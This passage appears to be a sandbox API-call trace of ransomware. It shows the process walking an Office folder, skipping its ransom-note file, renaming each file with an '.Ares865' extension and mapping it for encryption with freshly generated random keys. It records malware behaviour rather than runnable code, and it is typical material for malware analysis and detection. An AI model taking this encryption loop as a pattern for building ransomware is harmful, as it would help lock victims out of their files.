dwNumberOfBytesToMap=0x860) returned 0x190000 [0067.595] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.596] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.596] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.597] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.597] CloseHandle (hObject=0x120) returned 1 [0067.597] CloseHandle (hObject=0x164) returned 1 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.597] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2465f500, ftCreationTime.dwHighDateTime=0x1c68574, ftLastAccessTime.dwLowDateTime=0x60786a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2465f500, ftLastWriteTime.dwHighDateTime=0x1c68574, nFileSizeHigh=0x0, nFileSizeLow=0x6e87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGREPFRM.DPV", cAlternateFileName="")) returned 1 [0067.597] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.597] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="aoldtz.exe") returned 1 [0067.597] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML.Ares865") returned 70 [0067.597] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.xml.ares865"), dwFlags=0x1) returned 1 [0067.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.598] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1884) returned 1 [0067.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.598] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.599] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa60, lpName=0x0) returned 0x120 [0067.601] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa60) returned 0x190000 [0067.601] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.603] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.603] CloseHandle (hObject=0x120) returned 1 [0067.603] CloseHandle (hObject=0x164) returned 1 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.603] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6bca00, ftCreationTime.dwHighDateTime=0x1c68574, ftLastAccessTime.dwLowDateTime=0x60786a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b6bca00, ftLastWriteTime.dwHighDateTime=0x1c68574, nFileSizeHigh=0x0, nFileSizeLow=0xae41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGSIDEBR.DPV", cAlternateFileName="")) returned 1 [0067.603] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.603] lstrcmpiW (lpString1="DGSIDEBR.DPV", lpString2="aoldtz.exe") returned 1 [0067.603] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML.Ares865") returned 70 [0067.603] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.xml.ares865"), dwFlags=0x1) returned 1 [0067.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.604] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8398) returned 1 [0067.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.605] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.605] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.605] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.606] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23d0, lpName=0x0) returned 0x120 [0067.607] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23d0) returned 0x190000 [0067.609] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.609] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.609] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.610] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML.Ares865") returned 71 [0067.610] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebrv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebrv.xml.ares865"), dwFlags=0x1) returned 1 [0067.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebrv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.611] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3558) returned 1 [0067.611] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.612] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10f0, lpName=0x0) returned 0x120 [0067.613] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f0) returned 0x190000 [0067.614] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.614] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.614] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.615] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML.Ares865") returned 69 [0067.615] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstory.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstory.xml.ares865"), dwFlags=0x1) returned 1 [0067.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstory.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.616] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2948) returned 1 [0067.616] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.617] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe90, lpName=0x0) returned 0x120 [0067.619] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe90) returned 0x190000 [0067.620] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.621] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.621] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.621] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML.Ares865") returned 73 [0067.621] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstoryvert.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstoryvert.xml.ares865"), dwFlags=0x1) returned 1 [0067.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstoryvert.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.622] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2948) returned 1 [0067.622] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.623] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe90, lpName=0x0) returned 0x120 [0067.624] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe90) returned 0x190000 [0067.625] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.626] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.626] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.626] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML.Ares865") returned 67 [0067.626] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.xml.ares865"), dwFlags=0x1) returned 1 [0067.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.628] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5906) returned 1 [0067.628] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.628] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.628] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.629] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a20, lpName=0x0) returned 0x120 [0067.630] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a20) returned 0x190000 [0067.631] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.632] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.632] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.632] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML.Ares865") returned 69 [0067.632] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebad.xml.ares865"), dwFlags=0x1) returned 1 [0067.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.633] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0067.634] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.634] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x120 [0067.636] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0x190000 [0067.637] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.638] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.638] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.638] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML.Ares865") returned 70 [0067.638] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml.ares865"), dwFlags=0x1) returned 1 [0067.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.639] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4366) returned 1 [0067.639] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.640] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.640] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1410, lpName=0x0) returned 0x120 [0067.641] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1410) returned 0x190000 [0067.642] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.643] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.643] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.644] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML.Ares865") returned 70 [0067.644] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.xml.ares865"), dwFlags=0x1) returned 1 [0067.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.645] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7344) returned 1 [0067.646] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.646] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.646] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.646] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1fb0, lpName=0x0) returned 0x120 [0067.648] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fb0) returned 0x190000 [0067.649] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.650] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML.Ares865") returned 69 [0067.650] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.xml.ares865"), dwFlags=0x1) returned 1 [0067.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 